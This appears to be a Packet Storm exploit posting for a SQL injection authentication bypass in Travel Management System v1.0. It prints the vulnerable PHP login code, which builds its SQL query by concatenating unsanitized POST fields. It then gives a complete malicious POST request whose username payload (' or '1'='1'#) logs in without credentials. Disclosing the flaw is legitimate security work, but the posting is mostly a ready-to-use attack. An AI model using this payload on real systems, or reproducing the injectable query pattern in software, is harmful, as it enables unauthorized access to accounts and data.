Travel Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
760a289450add3ed69ac34686c2ac0875e492c2eaedd8b52cd0215906b35ebdc# Exploit Title: Travel Management System v1.0 - SQLi Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) and Bobby Cooke (boku)
# Date: August 10, 2020
# Vendor Homepage: https://www.projectsworld.in
# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/travel.zip
# Version: 1.0
# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
# Vulnerable Source Code
if(isset($_POST["sbmt"]))
{
$cn=makeconnection();
$s="select * from users where Username='" . $_POST["t1"] . "' and Pwd='" . $_POST["t2"] ."'";
$q=mysqli_query($cn,$s);
$r=mysqli_num_rows($q);
$data=mysqli_fetch_array($q);
mysqli_close($cn);
if($r>0)
{
$_SESSION["Username"]= $_POST["t1"];
$_SESSION["usertype"]=$data[2];
$_SESSION['loginstatus']="yes";
header("location:index.php");
}
else
{
echo "<script>alert('Invalid User Name or Password');</script>";
}
}
?>
# Malicious POST Request to /travel/admin/loginform.php HTTP/1.1
POST /travel/admin/loginform.php HTTP/1.1
Host: 192.168.222.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.222.135/travel/admin/loginform.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close
Cookie: PHPSESSID=n4g0c99qju1miu1dudci67bkjb
Upgrade-Insecure-Requests: 1
t1='+or+'1'%3d'1'%23&t2=hyd3sec&sbmt=LOGIN
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed